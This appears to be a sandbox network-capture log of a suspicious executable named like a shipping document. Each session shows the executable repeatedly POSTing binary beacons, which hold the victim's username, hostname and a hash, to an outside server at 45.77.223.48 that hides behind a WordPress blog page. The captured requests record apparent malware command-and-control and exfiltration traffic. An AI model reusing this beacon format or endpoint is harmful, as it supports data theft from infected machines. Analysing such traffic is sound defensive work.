                                              Apr 25, 2024 09:43:09.948570967 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                              Apr 25, 2024 09:43:09.948667049 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:09.956132889 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:09.956583023 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:09.956681013 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:09.956821918 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:09.957000971 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:09.957041025 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:09.957190990 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.44980645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:10.231972933 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:10.365226984 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:11.193577051 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:10 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:11.193600893 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:11.193995953 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:43:11.194008112 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:43:11.194017887 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:11.202768087 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:11.203032017 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:11.203130960 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:11.203207970 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:11.203522921 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.44980745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:11.469230890 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:11.599955082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:12.406363964 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:11 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:12.406382084 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:12.412800074 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:12.413032055 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:12.413162947 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:12.413599968 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:12.413742065 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:12.413813114 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:12.413831949 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:12.413845062 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.44980845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:12.681066036 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:12.811932087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:13.659035921 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:12 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:13.659121990 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:13.659195900 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:13.668746948 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:13.668795109 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                              Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:13.669081926 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:43:13.669120073 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:43:13.669173002 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:43:13.669190884 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
                                              Apr 25, 2024 09:43:13.669229031 CEST1289INData Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63
                                              Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.44980945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:13.935225964 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:14.065566063 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:14.907027006 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:14 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:14.907200098 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:14.907243967 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:14.916644096 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:14.917058945 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:14.917072058 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:14.917243958 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:14.917397022 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:14.917450905 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
